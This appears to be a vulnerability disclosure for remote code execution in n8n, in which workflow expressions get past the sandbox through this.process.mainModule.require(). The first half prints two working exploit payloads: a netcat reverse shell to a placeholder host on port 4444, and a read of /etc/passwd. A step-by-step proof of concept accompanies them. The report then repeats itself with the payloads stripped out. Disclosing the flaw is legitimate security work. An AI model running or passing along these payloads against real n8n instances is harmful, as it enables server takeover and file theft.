n8n Remote Code Execution via Expression Injection
A critical Remote Code Execution vulnerability exists in n8n's expression evaluation system that allows authenticated users to execute arbitrary system commands through crafted expressions in workflow parameters, resulting in complete system compromise.
Technical Analysis
Root Cause
The vulnerability stems from inadequate sandboxing in the expression evaluation system. While n8n implements AST-based protections through the tournament library, these protections can be bypassed by accessing Node.js built-in modules through the this.process.mainModule.require() pattern, which circumvents direct require() blocking mechanisms.
Affected Components
Primary: packages/workflow/src/expression.ts - Expression evaluation logic
Secondary: packages/tournament/src/FunctionEvaluator.ts - Core evaluation engine
Tertiary: packages/tournament/src/ExpressionBuilder.ts - AST transformation
Exploitation Details
Primary Attack Vector:
Authenticated users can inject expressions in workflow node parameters that start with ={{ and end with }}. When workflows are executed, expressions are evaluated in a context that provides access to Node.js built-in modules.
Confirmed Exploitation Method
For Reverse Shell:
{{ (function() { try { const cp = this.process.mainModule.require('child_process'); cp.execSync('mkfifo /tmp/f; nc xxxx 4444 < /tmp/f | /bin/sh > /tmp/f 2>&1; rm /tmp/f'); return 'nc_pipe_reverse_shell_attempted'; } catch(e) { return 'error: '+e.message; } })() }}
For Reading File:
{{ (function() { try { const fs = this.process.mainModule.require('fs'); return fs.readFileSync('/etc/passwd', 'utf8'); } catch(e) { return 'error: '+e.message; } })() }}
Proof of Concept
Step 1: Authentication
Log into n8n instance with valid credentials
Navigate to workflow creation interface
Step 2: Workflow Creation
Create a new workflow
Add a "Set" node or similar node accepting expressions
In a parameter field, insert the malicious expression
Step 3: Execution
Execute the workflow manually
Command execution occurs in the n8n server context
Remote shell connection established (if using reverse shell payload)
Step 4: Verification
Commands execute with the privileges of the n8n process
Full access to the underlying system
Ability to read/write files, execute commands, establish connections
fatihhcelik Reporter
n8n Remote Code Execution via Expression Injection
A critical Remote Code Execution vulnerability exists in n8n's expression evaluation system that allows authenticated users to execute arbitrary system commands through crafted expressions in workflow parameters, resulting in complete system compromise.
Technical Analysis
Root Cause
The vulnerability stems from inadequate sandboxing in the expression evaluation system. While n8n implements AST-based protections through the tournament library, these protections can be bypassed by accessing Node.js built-in modules through the this.process.mainModule.require() pattern, which circumvents direct require() blocking mechanisms.
Affected Components
Primary: packages/workflow/src/expression.ts - Expression evaluation logic
Secondary: packages/tournament/src/FunctionEvaluator.ts - Core evaluation engine
Tertiary: packages/tournament/src/ExpressionBuilder.ts - AST transformation
Exploitation Details
Primary Attack Vector:
Authenticated users can inject expressions in workflow node parameters that start with ={{ and end with }}. When workflows are executed, expressions are evaluated in a context that provides access to Node.js built-in modules.
Confirmed Exploitation Method
For Reverse Shell:
For Reading File:
Proof of Concept
Step 1: Authentication
Log into n8n instance with valid credentials
Navigate to workflow creation interface
Step 2: Workflow Creation
Create a new workflow
Add a "Set" node or similar node accepting expressions
In a parameter field, insert the malicious expression
Step 3: Execution
Execute the workflow manually
Command execution occurs in the n8n server context
Remote shell connection established (if using reverse shell payload)
Step 4: Verification
Commands execute with the privileges of the n8n process
Full access to the underlying system
Ability to read/write files, execute commands, establish connections